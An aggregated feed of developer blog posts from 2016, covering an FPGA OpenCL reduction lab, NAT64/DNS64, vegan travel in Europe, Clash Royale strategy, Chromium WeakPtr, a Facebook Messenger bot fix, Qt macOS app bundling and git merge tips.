by fcamel (noreply@blogger.com) at January 27, 2017 07:03 AM

September 21, 2016

LAB - Understand FPGA OpenCL


Goals

  • Patrice the emulation development environment
  • Understand Task (Single Work-Item) v.s. NDRange
  • Understand Loop Pipeline
  • * Understand Coalescing


Prerequisite


a.      PC requirement:
  • 64Bit CPU / >4G DDR
  • Win7 or Ubuntu 16.04 or other version
b.      About install PC environment
  1.  Obtain Licenses for Quartus , Altera SDK for OpenCL and PR (Partial Reconfiguration), set LM_LICENSE_FILE environment variable to the license
  2.  Install the Quartus II software v. 16.0 standard edition (including Arria10 , Stratix V and Cyclone V device families)
    1. Please install at c:\altera\16.0 (for run script later, otherwise you need modify the .bat in the test project)
  1. Download and install the Altera SDK for OpenCL version 16.0
  1. Compiler Environment
    1. Windows : Install the Visual C++ 2010 Express version of Microsoft Visual Studio with support for C++ fromhttp://www.microsoft.com/visualstudio/eng/downloads.
      • Professional version is OK if you have a license for that.
    2. Linux :
      • Use “apt-get install build-essential” to prepare build environment
  2. If you do NOT have Visual C++ Professional
    1. Open the Programs & Features control panel in Windows 7.  Manually uninstall all Microsoft Visual C++ 2010 programs that have the word “Redistributable” in them, both x64 and x86 versions
    2. Download and install Microsoft Windows SDK Version 7.1 from http://www.microsoft.com/en-us/download/details.aspx?id=8279 . This software allows the compilation of 64-bit executables that are needed for the Altera OpenCL solution
  3. Also, you do NOT need Intel SDK for OpenCL anymore
  4. Before start the Lab day. Please make sure can understand PSG OpenCL emulator mode
 



Introduction

  OpenCL allows developers to write portable, high-performance code that can target all varieties of parallel processing platforms, including Intel CPUs, FPGAs and GPUs. Programming OpenCL on FPGA is much different in Programming OpenCL on GPUs. By leveraging loop-pipeline features, Sequential execution is accepted in many cases to get simple performance improvement.  
 This article discusses simple reductions. A reduction is a very simple operation that takes an array of data and reduces it down to a single element, for example – by summing all the elements in the array. Consider this simple CPU-C code, which sums all the elements in an array:
float reduce_cpu_sum(float* input, int length) {
 float accumulator = input[0];
 for(int i = 1; i < length; i++)
   accumulator += input[i];
 return accumulator;
}
This code is completely sequential! There’s no way to parallelize the loop, since every iteration of the loop depends on the iteration before it. How can we loop-pipeline it? How can we parallelize this code?
Hope all attendee can understand NDRange and Task implementation through this hands-on.


Lab1 - Task and Loop-pipelined Version

CPU version

float reduce_cpu_sum(float* input, int length) {
 float accumulator = input[0];
 for(int i = 1; i < length; i++)
   accumulator += input[i];
 return accumulator;
}
 Idea - in the above code, length is undetermined variable so compiler can’t unroll the for-loop correctly. We can divide DATA into const-M parts. And wrap the original for-loop by another for-loop with const-M. Each iteration handle length/const-M data, accumulate them and save it into local memory. After that, we can accumulate the local memory again.
Since compiler knows the const-M in compiler times, Compiler can unroll this wrapper for-loop automatically (or manually).



Advanced Topics - Running on the real device.
To speed up the simulation time, we let DATA_N be a small number 1000. Please increase this number to 1000000 and test the total performance.

Hands-on - implement above algorithm

Advanced Topics -
  • Running on the real device.
  • Compare the performance with Lab1.


Lab2 - Loop-pipelined Version and Memory access patterns


 In the previous code. To speed-up the performance, we unroll the level-1 for-loop in previous code. Since we have 0….M accumulator and global memory read instructions. The memory access pattern is shown below :
The access pattern is interleave and not continuous. It will cause cache penalty.  
To improve cache performance and hit rate. We can change the access pattern from above to below -
Hands-on - implement above algorithm

Advanced Topics -
  • Running on the real device.
  • Compare the performance with Lab1.


Lab3 - NDrange Version (Optional)


At the OpenCL work-group level. We’ll take advantage of associativity to break the vector into small chunks, each of which we’ll build independent reduction trees for each chunk, and execute them independently, in parallel. We’ll make sure each of the chunks is small enough that it fits in local memory, and then we’ll assign one work-item per element.
At each stage of the reduction tree, we’ll be loading and storing partial reductions as we compute, so it’s crucial to use local memory to communicate between work-items in the work group. We’ll then execute the reduction tree by using a for loop in conjunction with OpenCL barriers. For example, see the following figure, which performs a min reduction to find the smallest element in a vector:




__kernel
void reduce(
           __global float* buffer,
           __local float* scratch,
           __const int length,
           __global float* result) {

 int global_index = get_global_id(0);
 int local_index = get_local_id(0);
 // Load data into local memory
 if (global_index < length) {
   scratch[local_index] = buffer[global_index];
 } else {
   // Infinity is the identity element for the min operation
   scratch[local_index] = INFINITY;
 }
 barrier(CLK_LOCAL_MEM_FENCE);
 for(int offset = get_local_size(0) / 2;
     offset > 0;
     offset >>= 1) {
   if (local_index < offset) {
     float other = scratch[local_index + offset];
     float mine = scratch[local_index];
     scratch[local_index] = (mine < other) ? mine : other;
   }
   barrier(CLK_LOCAL_MEM_FENCE);
 }

 if (local_index == 0) {
   result[get_group_id(0)] = scratch[0];
 }
}



LAB - modify host code (opencl_main.cpp) and execute above code correctly.



Hint for LABs


  1. Naive, serial-based and task based solution is included in the lab-material. Please modify reduce.cl, follow the document and implement your version

  2. When attendee use Linux environment, Makefile is ready. And attende can use “make run_emulator” to compile, execute and monitor the result.
  3. When attendee modify the .cl file. All .cpp and .c file don’t required to recompile


Reference


by maple (noreply@blogger.com) at September 21, 2016 07:13 AM

June 26, 2016

NAT64 和 DNS 64

參考資料

IPv4 要用完了 (喊了十幾年, 最近是玩真的了), 在骨幹和 server 都轉成 IPv6 的過渡期, 用戶端也要轉換, 不然 server 是轉心酸的。但是大量 server 還是用 IPv4, 所以要讓 client 能同時支援 IPv4 和 IPv6才行。

如果你是網管, 希望讓用戶可以同時連 IPv4 和 IPv6 的位置, 一個可能的作法是建置「純 IPv6 環境」, 永遠拿到 IPv6 位置, 永遠連 IPv6 的位置。但要讓 IPv6 client 也能連 IPv4 位置, 需要 NAT64+DNS64 幫忙處理。

原理是 DNS64 會同時查 IPv6 和 IPv4 的位置, 有 IPv6 就用 IPv6, 沒有就轉換 IPv4 為 IPv6, prefix 配合 NAT64 的設定, 讓 client 連往該 IP 的封包會先經過 NAT64 router。第二份 slide 有詳細的流程圖。

然後 NAT64 會再轉換 IPv6 的封包成 IPv4 出去, 無縫接上用 IPv4 位置的 server。至於 client 收到 DNS64 回應的正常 IPv6 位置, 就透過一般 router 直接出去, 不用經過 NAT 64。

對設計後端 server 的人來說, 有愈多用戶可以連 IPv6 位置, 有愈高的機會考慮用 IPv6 位置。

對 app 開發者來說, 了解有些用戶的網路環境會用 DNS64+NAT64 的配置, 所以要用 domain name 連上自家 server, 這樣自家 server 用 IPv4 或 IPv6 都會通。

by fcamel (noreply@blogger.com) at June 26, 2016 08:33 AM

June 16, 2016

德國瑞士荷蘭素食心得

前陣子去這些國家玩了十多天。我平時是吃 vegan (台灣稱為植物五辛素), 去之前有用 Happy Cow 稍微查一下, 後來到那邊懶得用 Happy Cow 查, 三個國家都是直接用 Google Map app 搜 "vegetarian restaurant", 然後看使用者評論判斷是否有提供 vegan。印象中這三個國家的 vegetarian 餐廳都有提供 vegan 餐, 有些餐廳標示相當清楚, 有些是詢問後可以提供。懶得事先調查的話, 大都市直接用 Google Map 應該至少能找到一家店, 再不然連鎖超市裡也有部份 vegan 食品。

德國

去了幕尼黑、佛萊堡、法蘭克福、柯隆。在柯隆的時間比較趕沒有去吃飯, 其它地方坐公車十分鐘左右都有提供 vegan 的餐廳, 不過要注意多數餐廳週日沒開。

幕尼黑選擇最多, 也有週一到週日都開的餐廳。我們最常去的是 Max Pett... Das Vegane Restaurant, 晚上開到 23:00, 餐點很多選擇都滿不錯的, 服務也不錯 (高於德國一般餐聽), 唯一的缺點是價格稍高。 Max Pett 有提供英文菜單, 不會點的話也可以看 別人傳到 Yelp 的照片找菜名。

除了素食餐廳較多外, 幕尼黑還有專賣 vegan 食品的超市 Veganz, 而且車站附近的 Denn's Biomarket 有許多 vegan 食品, 標示也很清楚。德國的一般超市也有部份 vegan 食品, 像是豆奶 (soya milk)、植物性優格、沙拉、麵包、香腸、火腿、起士等, 食品上會特別註明是 vegan 或 veggie (素食, 不一定是 vegan)。在幕尼黑吃素真是相當方便。連我們住的飯店早餐都有提供 vegan 的奶油, 服務生也清楚 vegan 的定義。

下圖是 Denn's Biomarket 內拍的照片, 最下面標示的 "V" 表示是 vegan。

下圖是老婆用 Veganz 買的食材自己作的漢堡, 作為在新天鵝堡的午餐。

瑞士

瑞士素食餐廳和食品較德國少, 位於蘇黎世號稱世上第一家素食餐廳 HILTL (中文介紹) 相當驚人, 全年無休, 早上開到淩晨, 提供坪重的自助餐和單點。店內菜超多, 我們裝到盤子爆滿還有許多想吃的菜沒空間放了。HILTL 有另外開連鎖店 tibits, 也是提供自助餐, 營業時間也超長。 HILTL 和 tibits 都會在各道菜上標明是否為 vegan。一些大都市像是伯恩 (Bern)、 琉森 (Luzern) 的車站站內有開 tibits, 滿方便的。

荷蘭

阿姆斯特丹有多家連鎖 maoz, 提供口袋餅 (?) 或沙拉, 路上隨便走走都會遇到吧, 很晚才關 (不同家不同, 22:00或更晚)。也有其它素食店, 最大的連鎖超市 Albert Heijn 也有一些 vegan 的食物。我們也有去鹿特丹, 那邊的 Spirit 很好吃, 也是自助餐坪重, 然後各道菜上有標是否為 vegan。我們午餐吃得很滿意, 晚餐就沒有去試另一家, 繼續吃 Spirit。

總結

三個國家的大都市吃素都不算問題, 比較小的都市假日可能沒有素食餐廳, 更小的餐廳可能一家都沒有 (像瑞士的策馬特和施皮茨), 只能在超市買菜回來夾麵包。需要注意的是多數飯店沒有提供熱水壺, 不過可以和飯店櫃台要熱水。若想自己直接煮泡麵或菜, 要自己帶或當地買快煮壺。自己帶快煮壺要注意歐洲電壓是 220v 需要變壓器, 還有插座接頭不同, 也許需要轉接頭。

by fcamel (noreply@blogger.com) at June 16, 2016 05:40 PM

June 15, 2016

歐洲行隨筆 - 1

原以為第一次去歐洲應該會有許多啟發, 結果還好。忽然想到, 或許就像村上春樹說的, 只是先記下這些事物。日後會再慢慢地在腦中整理建檔, 那天需要的時候, 就會有所啟發了。

旅行的當下覺得沒什麼的小事, 回來後會有些懷念, 或許是因為稀有, 會不經意地回憶旅途中所見的片段場景, 偶而間斷地浮現。

by fcamel (noreply@blogger.com) at June 15, 2016 08:10 PM

Clash Royale 微課金九等牌上 3308 杯

對照 HKES 的徵人基本條件 (最高獎盃數3000/3300 = 玩家等級8/9), 當作一個紀念吧 XD, 再來應該會愈來愈少打吧。

by fcamel (noreply@blogger.com) at June 15, 2016 03:30 PM

May 21, 2016

[C++] chromium WeakPtr implementation

C++11 provide weak_ptr for NOT sharing shared_ptr with other ref-counted pointer. Here is basic idea about how to implement it:





+--------------> T object <-----------------------+
+ +
T*ptr T*ptr
+---------------+ ref +-----------------+ ref +---------------------+
| WeakReference | +----> | Flag (ref count)| <-----+ WeakReferenceOwner |
+---+-----------+ +----------+------+ +------+--------------+
| ^ |
| +---------------------+
| | Invalidate: when last WeakReferenceOwner
| | deleted or owner want to invalidate object.
| |
+-------------------------------+

Check Flag validate before access object

The basic idea is we create class (WeakReference/WeakReferenceOwner) which share a ref-count flag which will indicate whether the reference object is still valid. Whenever you want to access the T* object, WeakReference will first check flag first, and return NULL if flag is invalid. This method could prevent leak large memory usage if the real T* object is large because only a small flag is shared.

by Yu-Teh Shen (noreply@blogger.com) at May 21, 2016 07:25 AM

Clash Royale 微課金上鬥技場8 (3013杯)

前言

雖說花了 $590, 但花的錢都拿來買新卡玩 (像是黑暗王子、盾牌兵..., 一起拿盾衝鋒超帥!!), 對於爬盃沒什麼幫助 XD。

或是用來升我覺得很難應付的牌組, 打個一陣子被對手打爆後, 就會知道這些牌組的弱點在那 XD (像是電火豬、皇家巨人)。另外, 打上3000 杯的那場對手打到一半就不動了...., 所以本來要再掙扎個一陣子才能上 3000 杯吧。

個人資料

大部份牌還是 8 本規格, 只有野蠻人和主塔上 9 , 但對防守幫助很大。

自 4/16 看到官方大賽 Jason 技壓全場後, 就開始玩 Jason 牌組。這個牌組非常有趣, 攻守平衡, 又沒有史詩牌, 適合長期發展。

核心想法

這遊戲大家都知道後出手有利 (除電火豬少數牌組外), 所以關鍵在於如何用集水器或巨人逼對手先出手。藉由反擊賺水差, 接著評估形勢決定是否要打一波過去。如果對手防守太硬, 就等場上有雙集水器再出兵。下巨人的時機以及巨人的位置是這套牌的關鍵。

巨人幾乎不會下國王塔後, 那樣太慢會被對手快攻打一波。最多放在國王塔前, 可以防王子小皮卡之類的快攻, 也可以擋對手進攻後排的範圍傷害 (如法師或火龍), 讓我方遠程可以持續輸出解危。所以巨人的等級最重要, 其次是豬。再來我覺得野蠻人比其它重要, 加強防守力道。

集水器幾乎都是滿水再下, 若我確定對手是集一波大的才會攻擊 (如電磁炮), 也會先下藉此提早拿下一張的防守牌。如果集水器是下一張, 在國王塔後下哥布林或弓兵, 看對手動作, 沒什麼危機就滿水下集水器。

集水器都下塔後, 除非分數領先, 要龜到時間到, 才會放在國王塔一兩格用來存水兼防守。對手用法術轟集水器也無所謂, 那表示對手暫時沒有解野蠻人的法術, 有機會用野蠻人反擊打一波。另外, 倒數一分鐘不該下集水器, 會來不及領完存下的水, 反而造成危機。如果確定會進延長賽才能下, 然後延長賽時就不該再下了。

進攻

基本上就是巨人當坦, 哥布林或弓兵隨後,很少用豬進攻。因為少了冰火電毒的輔助, 豬進攻力道不夠, 在這牌組裡是助攻角色。通常是下巨人後看情況補豬,比方說打對手另一路分散對手解牌, 或是中央橋前跳豬幫巨人提前拆掉黃金位的防禦。或是巨人快不行時補豬衝進去換手當坦, 讓後排能持續輸出。另外, 確認對手剛好手上沒有解亡靈大軍的牌時 (比方說對手剛出完箭雨, 通常要再下 3 ~ 4 張才能再抽回來), 可以用豬當坦配亡靈大軍快攻直接爆一塔, 可說是輔助必殺技啊!

巨人下國王塔前走到橋前剛好補回五水, 對手在這段時間內有滿水不出牌的壓力, 很可能會先下解巨人的牌, 這時就可以再補牌助攻或放生巨人等下一波。比方說對手先下火塔, 就在巨人前補野蠻人保護巨人, 或是放生巨人, 也不會虧水差。但若直接在橋前下巨人, 就沒有這個「後出手」的優勢了。

確認對手沒火球的話, 可以橋前下野蠻人再用巨人切開野蠻人, 讓兩個在前兩個在後, 然後後排補遠程。

爆對手一塔後基本上是防守, 若守不住的話, 可以在對方國王塔和護衛塔中間下巨人接著跟亡靈大軍奇襲換塔, 效果也不錯。

防守

野蠻人是主力守門員, 沒有的時候才會改用亡靈大軍。用野蠻人守豬時, 盡量下在橋前, 來不及就再退一點, 真的不行才下塔前。因為對手接著大概會用火球轟野蠻人, 太靠近塔就虧了。還有野蠻人下得夠快, 豬碰不到塔就掛了。

對到皇家巨人時, 要第一時間橋前下野蠻人, 對手加碼我方也加碼後排加速清巨人。這樣皇家巨人開個兩三炮就會掛了, 然後我方看情況反擊一波, 或安全下集水器賺水差。有時也可以在中間橋前偏防守這側下豬, 對手才剛進攻準備補後排結果就有隻豬衝進來, 會打亂節奏。豬很有機會打到塔。若對手後排下法師更好, 法師會打豬, 野蠻人會清掉皇家巨人繼續往前打法師, 我方在野蠻人後補哥布林, 11水互換的結果, 我方會賺比較多護衛塔的傷害。

遇到巨球也是用野蠻人解巨人, 巨人掛了, 氣球很快也會掛, 雖然會被氣球炸個兩下, 但反擊一波很有機會直接爆對手的塔。千萬不要用亡靈先解氣球, 還沒解掉就會被箭雨幹掉。

如果對手只是小兵騷擾, 通常無視用塔吸收傷害賺水差。偶而可以用豬拉兵解危。比方說對方小皮卡衝到中間, 在他側邊放豬, 護衛塔不會損血, 又可讓豬去探探路,可能可以摸到塔或逼對手又花小兵解豬。如果沒有解野蠻人的牌時,也可以橋前中間下豬分散野蠻人的數量, 一群被拉成一直線, 減輕護護塔壓力。我是練電火豬時順便練用豬防守的技巧, 剛好在這牌組也很有用。

弱點

  • 怕被女武神、法師等範圍傷害切後排, 但反過來說也可在防守時用巨人吸範圍傷害的攻擊, 再反打一波, 這時對手就沒打我方後排的好牌了。
  • 因為沒有範圍傷害的牌, 很難應付小屋流 (很難賺到水差), 開局不順就只能求和了。
  • 遇到沉底一波火力超猛的也不容易應付, 像是三槍手或電磁炮。這時只能勉求用豬快攻打另一路, 看對手會不會忍不住花太多水解危。若對手沒花什麼水, 集中火力打一路, 就只能在對方過橋後下巨人坦炮火, 然後下野蠻人或亡靈大運切後排, 容錯率很低, 不小心卡牌造成水不夠就掛了。
  • 冰法師超OP, 有他在就打不太進去, 只能打另一路, 勝算不高。不知高手們怎麼應付冰法師。

其它

最後附上對戰記錄作個記念:

by fcamel (noreply@blogger.com) at May 21, 2016 06:56 AM

May 17, 2016

“(#100) No matching user found” - Facebook Messenger Bot Bug

On May 13th, I found that my Facebook Messenger bot failed to response some users, and as I read the error log of my webhook process, then got something like:
"error": {
"message": "(#100) No matching user found",
"type": "OAuthException",
"code": 100,
"fbtrace_id": “XXXXXXXXXXX”
}

Some Backgrounds

At this point, Facebook Messenger Bot is still new, which is reasonable to have some bugs. I’m using `Node.js for my webhook on Heroku, and I followed the tutorial provided by Facebook for setting up the bot.

Why?

Soon, I found this bug is discussed on Facebook Bug Page here. The problem is that Facebook decided to switch their encoding to use strings instead of ints for user & page IDs, which made the example code (template code) on Facebook official tutorial page fail to response users with string IDs.

Then?

Facebook send out notifications to the app developers saying:
On Tue May 17 format of user and page ids delivered via webhooks will change from an int to a string to better support default json encoder in js (that trims long ints). Please make sure your app works with string ids returned from webhooks as well as with ints.

Solution

I believe that Facebook will make the original code in the tutorial work pretty soon; however, there are people providing the solution online already. Here’s the template code that should work:
var express = require('express');
var bodyParser = require('body-parser');
var request = require("request");

var app = express();

const JSONbig = require('json-bigint')

app.set('port', (process.env.PORT || 5000));

app.use(express.static(__dirname + '/public'));
app.use(bodyParser.text({ type: 'application/json' }))

app.listen(app.get('port'), function() {
console.log('Node app is running on port', app.get('port'));
});

var token = "<YOUR_TOEKN_HERE>";

function sendTextMessage(sender, text) {
messageData = {
text:text
}
request({
url: 'https://graph.facebook.com/v2.6/me/messages',
qs: {access_token:token},
method: 'POST',
json: {
recipient: {id:sender},
message: messageData,
}
}, function(error, response, body) {
if (error) {
console.log('Error sending message: ', error);
} else if (response.body.error) {
console.log('Error: ', response.body.error);
}
});
}

app.post('/webhook/', function (req, res) {

var data = JSONbig.parse(req.body);
messaging_events = data.entry[0].messaging;

for (i = 0; i < messaging_events.length; i++) {

event = data.entry[0].messaging[i];
sender = event.sender.id.toString();

if (event.message && event.message.text) {
text = event.message.text;
sendTextMessage(sender, text);
}

}

res.sendStatus(200);

});
Make sure you’ve added body-parser, express, json-bigint, and request to your NPM.

Finally

My Bot, Ducky, is now working well and be public, please feel free to message him here: http://m.me/ducky.bot!


by Heron Yang (noreply@blogger.com) at May 17, 2016 07:38 AM

May 05, 2016

Qt Mac Application Failed to Create Self-contained App Bundle (Qt Creator Build)

Recently, I encountered a problem in creating an app bundle using Qt Creator with Qt 5.6, so I posted my question with detail on StackOverflow here.

In this post, I am going to point out the places I got wrong, and some studies.

Scott

Scott is a friend of mine for years, and he is best programmer I’ve ever met in Taiwan. He helped me on this question, and I would like to quote his words here:

Do try to figure out what you did wrong before. Look at the RPATH, install names etc in your executable and update your StackOverflow question with those findings. Finding out what you did wrong is an important step in understanding a system. This makes your exercise of publishing apps on multiple platforms more meaningful.

@executable_path, @loader_path, @rpath

The first reason I couldn’t build the app build is that I didn’t fully understand the path names used on Mac, and here is my study of @executable_path, @loader_path, and @rpath.

  • @executable_path: the folder path of application’s executable
    • ex. /Applications/Foo.app/Contents/MacOS
    • useful for frameworks embedded inside the applications
  • @loader_path: the folder path of the related plug-in’s code
    • ex. /Library/Application Support/Foo/Plug-Ins/Bar.bundle/Contents/MacOS
    • useful for frameworks embedded inside plug-ins
    • availabe from Mac OS X 10.4
  • @rpath: instructs the dynamic linker to search a list of paths in order to locate the framework
    • no need to specify the “install path” using either @executable_path or @loader_path, but pass additional flags when building the host application (ex. -rpath @excutable/…/Frameworks or /Library/Frameworks)
    • availabe from Mac OS X 10.5

otool

The second reason I was stuck is that otool didn’t resolve @rpath names, so I was confused when it always returned me the same thing.

However, Scott wrote another version of otool that resolves the rpaths here. Here are the steps that demostrate the difference:

> otool -L bibi.app/Contents/MacOS/bibi
bibi.app/Contents/MacOS/bibi:
@rpath/QtWidgets.framework/Versions/5/QtWidgets (compatibility version 5.6.0, current version 5.6.0)
@rpath/QtGui.framework/Versions/5/QtGui (compatibility version 5.6.0, current version 5.6.0)
@rpath/QtCore.framework/Versions/5/QtCore (compatibility version 5.6.0, current version 5.6.0)
/System/Library/Frameworks/OpenGL.framework/Versions/A/OpenGL (compatibility version 1.0.0, current version 1.0.0)
/System/Library/Frameworks/AGL.framework/Versions/A/AGL (compatibility version 1.0.0, current version 1.0.0)
/usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 120.1.0)
/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1226.10.1)

> otool-rpath bibi.app/Contents/MacOS/bibi
/Users/heron/Qt/5.6/clang_64/lib

> macdeployqt ./*.app -verbose=3 -always-overwrite -appstore-compliant

> otool -L bibi.app/Contents/MacOS/bibi
bibi.app/Contents/MacOS/bibi:
@rpath/QtWidgets.framework/Versions/5/QtWidgets (compatibility version 5.6.0, current version 5.6.0)
@rpath/QtGui.framework/Versions/5/QtGui (compatibility version 5.6.0, current version 5.6.0)
@rpath/QtCore.framework/Versions/5/QtCore (compatibility version 5.6.0, current version 5.6.0)
/System/Library/Frameworks/OpenGL.framework/Versions/A/OpenGL (compatibility version 1.0.0, current version 1.0.0)
/System/Library/Frameworks/AGL.framework/Versions/A/AGL (compatibility version 1.0.0, current version 1.0.0)
/usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 120.1.0)
/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1226.10.1)

> otool-rpath bibi.app/Contents/MacOS/bibi
@executable_path/../Frameworks

macdeployqt

The last reason I failed to understand what’s going on is the output of macdeployqt, which confused me.

> macdeployqt bibi.app
File exists, skip copy: "bibi.app/Contents/PlugIns/platforms/libqcocoa.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/printsupport/libcocoaprintersupport.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqdds.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqgif.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqicns.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqico.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqjpeg.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqtga.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqtiff.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqwbmp.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqwebp.dylib"
WARNING:
WARNING: "bibi.app/Contents/Resources/qt.conf" already exists, will not overwrite.
WARNING: To make sure the plugins are loaded from the correct location,
WARNING: please make sure qt.conf contains the following lines:
WARNING: [Paths]
WARNING: Plugins = PlugIns

However, in Scott’s solution, he gave following additional arguments:

  • -verbose=3: see how the rpaths are updated in details (Scott’s log)
  • always-overwrite: copy files even if the target file exists, so the first (Scott: I used “always-overwrite” to get predictable results after repeated testing, since the Qt frameworks would be copied into the app bundle.)
  • appstore-compliant: skip deployment of components that use private API (Scott: appstore-compliant was just for your convenience)

Test

Testing is one additional thing the made the original question harder to be solved: there’s no easy way to see if my app bundle works on the other machine without Qt installed.

Instead of asking friends to run the app, Scott mentioned that we can use `lsof at run-time.

> ps aux|grep bibi
heron 21610 0.0 0.5 2632680 40272 ?? S Tue09PM 5:32.80 /Users/heron/Project/bibi/bibi/build-bibi-Desktop_Qt_5_6_0_clang_64bit-Release/bibi.app/Contents/MacOS/bibi
heron 39245 0.0 0.0 2434840 664 s003 R+ 9:31AM 0:00.00 grep --color=auto bibi

> lsof -p 39183 | grep QtCore
bibi 21610 heron txt REG 1,4 6441676 168354669 /Users/heron/Qt-free/5.6/clang_64/lib/QtCore.framework/Versions/5/QtCore

After macdeployqt, the app bundle no longer needs to link to frameworks outside the bundle:

> ps aux|grep bibi
heron 39352 0.0 0.0 2435864 788 s003 S+ 9:32AM 0:00.00 grep --color=auto bibi
heron 39315 0.0 0.8 2611176 63000 ?? S 9:32AM 0:00.68 /Users/heron/Project/bibi/bibi/bibi/bibi.app/Contents/MacOS/bibi

> lsof -p 39315 | grep QtCore
bibi 39315 heron txt REG 1,4 6017532 171823963 /Users/heron/Project/bibi/bibi/bibi/bibi.app/Contents/Frameworks/QtCore.framework/Versions/5/QtCore

Summary

I would say the biggest problem is that I didn’t know how to read @rpath, so Scott’s otool-rpath or lsof helps eventually.

Reference

by Heron Yang (noreply@blogger.com) at May 05, 2016 02:46 AM

April 24, 2016

April 16, 2016

Clash Royale 無課金上鬥技場 7 (2238杯)

好遊戲需要大家支持, 會再找機會花點錢支持遊戲。

迫擊炮牌組

我是先用這組打上 2000, 特色是防守強, 慢慢用迫擊炮削血。不過若是先被爆一塔就超難贏了。試了一些組合, 覺得起手小屋, 有個 7 滴水後再蓋迫擊炮最穩。己方可立於不敗之地。

野豬騎士牌組

後來改用豬玩快攻, 有時贏有時輸, 再針對弱點補強。基本牌如下:

  • 進攻: 豬、大電 (克建築、法師、女巫, 還有削血和撿尾刀)
  • 防守: 加農炮、兩個打空的、箭雨或火球

剩下兩張依牌組調整。試了多種組合, 最後覺得這樣最順:

  • 豬和王子配合可以打同路或打不同路增加快攻組合
  • 火龍和王子可以防守, 並在反擊時於後面補矛哥布林磨掉對手箭塔一些血。
  • 火球比箭雨難瞄, 但可以用在更多場合。改用箭雨就得補女武神應付野蠻人或一堆兵湧進來。火球用在大軍湧入時容易賺水差。
  • 小骷髏可以解很多狀況賺水差 (甚至解掉亡靈大軍!), 還有方便洗牌。時間快到時差兩擊閃電, 用這剛剛好。

其它試過還不錯但不夠順的組合:

  • 小電: 增加野豬進攻的成功率, 不過改用王子 + 火球攻守平衡性更佳。
  • 小皮卡: 搭豬進攻效果和王子一樣好, 但防守能力不如王子。用王子比較穩一點。
  • 火槍手: 打氣球很好用, 但血太少在進攻時容易被解掉 (例如火球)。小火龍攻擊力雖然只有火槍手一半, 但血厚又在空中, 存活時間長可以增加對手壓力。
  • 女武神: 防守力很強, 但反擊力道弱了點, 改用火球攻守都比較靈活。

野豬+王子可以打到 2100+, 但再之後還是不夠順。加上打膩野豬, 就改用小皮卡組新牌組:

小皮卡牌組

核心的想法是: 小皮卡攻擊力很高, 對手只要不小心讓他溜進射程, 沒幾刀就爆箭塔了。

但是小皮卡血太薄了, 所以有兩種配套進攻方案:

  • 用大骷髏讓對手分神耗掉防守的牌。再看情況從另一路或跟著大骷髏進攻。
  • 用小電解雜兵或電箭塔讓小皮卡至少可以砍箭塔一刀比方說用小皮卡往前衝, 對手用亡靈大軍, 我方用小電電亡靈大軍, 這樣花 6 滴水可以造成對手 400+ 的傷害並耗掉 5 滴水 (之後解半殘的亡靈大軍很容易)。

輔助兵種:

  • 矛哥布林可以在大骷髏和小皮卡後輔助清雜兵。或許換掉刀哥布林改用弓箭手會讓攻守更有彈性, 容易洗出進攻組合。
  • 亡靈大軍用來解氣球, 或在確認對手沒箭雨時輔助進攻。
  • 大電用來拆防禦塔或小屋流。拆炸彈塔和地獄塔特別好用。

另外, 大骷髏防守能力很強, 可以安心地去掉火球改小電。

其它

接下來想回頭玩進攻很猛的牌組, 以前有玩過大皮卡+法師+集水器, 但打不上 2000 杯。不知是牌組問題還是當時技術不夠熟練。手上有一級石頭, 不過不太會用。今天抽到一級野暗王子, 不過一級級血量有點少, 感覺在 2000 杯區間, 要到二級再用比較穩一點?

by fcamel (noreply@blogger.com) at April 16, 2016 10:04 AM

如何 git merge 更改檔名的檔案

參考資料:

如果在 branch 裡有 rename file X 為 Y, 並且 master 和 branch 都有改 X ( Y ) 的內容。那麼, merge master 的時候, git 可能會回報 master 的 X 被刪除了, 造成 merge conflict (deleted in ... and modified in ...)。

解法是提高 merge.renameLimit, 比方說 git config merge.renameLimit 999999999。merge 時間會久一點, 但 git 會找出 X 在 branch 裡已被 rename 成 Y。

by fcamel (noreply@blogger.com) at April 16, 2016 03:51 AM

用 vimdiff 作 git merge

參考文章

以前我用 kdiff3, 後來需要在 terminal merge, 改試 vimdiff, 也很好用。

設定:

$ git config --global merge.tool vimdiff

執行 (在 git merge 有 unsolved conflict 後):

$ git mergetool

UI 顯示:

  • 左上: LOCAL
  • 中上: BASE
  • 右上: REMOTE
  • 下面: 編輯區

vim 指令:

  • [c, ]c: 在 hunk 間移動, 和 vim-gitgutter 一樣
  • 搜 "<<<<" 找 conflict
  • :diffget LOCAL: 目前的 hunk 選用 LOCAL
  • :diffget REMOTE: 目前的 hunk 選用 REMOTE
  • :diffupdate: 更新 diff 畫面

修改後存檔離開, 會自動 resolved conflict。無修改離開會跳過 merge, 維持原本狀態。

其它

查看 merge 狀態:

$ git status

如果整份檔案都要選用 LOCAL, 改用 git 指令:

$ git checkout --ours

全用 REMOTE:

$ git checkout --theirs

by fcamel (noreply@blogger.com) at April 16, 2016 03:30 AM

April 15, 2016

GNU Make

← Older revision Revision as of 10:24, 15 April 2016
Line 1: Line 1:
 
== Recommended Reading ==
 
== Recommended Reading ==
 
* [http://www.gnu.org/software/make/manual/html_node/Quick-Reference.html GNU Make Manual Appendix A Quick Reference]
 
* [http://www.gnu.org/software/make/manual/html_node/Quick-Reference.html GNU Make Manual Appendix A Quick Reference]
 +
* [http://elinux.org/Debugging_Makefiles elinux: Debugging Makefiles]
 
* [http://oreilly.com/catalog/make3/book/index.csp Managing Projects with GNU Make 3rd Ed. by Robert Mecklenburg]
 
* [http://oreilly.com/catalog/make3/book/index.csp Managing Projects with GNU Make 3rd Ed. by Robert Mecklenburg]
  

by Scott.tsai at April 15, 2016 10:24 AM

April 10, 2016

Kali Tool Series - dc3dd

